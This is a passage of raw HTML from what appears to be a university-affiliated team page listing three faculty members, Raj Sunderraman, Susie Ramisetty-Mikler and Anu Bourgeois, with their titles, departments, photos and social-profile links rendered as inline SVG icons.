0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c439-outer\">\n            <div data-colibri-id=\"182-c439\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c439 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c440\" class=\"d-block style-980 style-local-182-c440 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-sunderraman1.jpeg\" class=\"wp-image-702 style-980-image style-local-182-c440-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c440-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c441\" class=\"h-global-transition-all h-heading style-974 style-local-182-c441 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c441\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c442\" class=\"h-text h-text-component style-975 style-local-182-c442 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c443\" class=\"h-text h-text-component style-976 style-local-182-c443 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c444\" class=\"style-981 style-local-182-c444 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c445-outer\">\n            <div data-colibri-id=\"182-c445\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c445 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c446\" class=\"d-block style-982 style-local-182-c446 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c446-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c446-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c447\" class=\"h-global-transition-all h-heading style-974 style-local-182-c447 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c447\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c448\" class=\"h-text h-text-component style-975 style-local-182-c448 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c449\" class=\"h-text h-text-component style-976 style-local-182-c449 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c450\" class=\"style-983 style-local-182-c450 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c455-outer\">\n            <div data-colibri-id=\"182-c455\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c455 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c456\" class=\"d-block style-973 style-local-182-c456 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c456-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c456-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c457\" class=\"h-global-transition-all h-heading style-974 style-local-182-c457 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c457\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c458\" class=\"h-text h-text-component style-975 style-local-182-c458 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c459\" class=\"h-text h-text-component style-976 style-local-182-c459 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c460\" class=\"style-977 style-local-182-c460 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 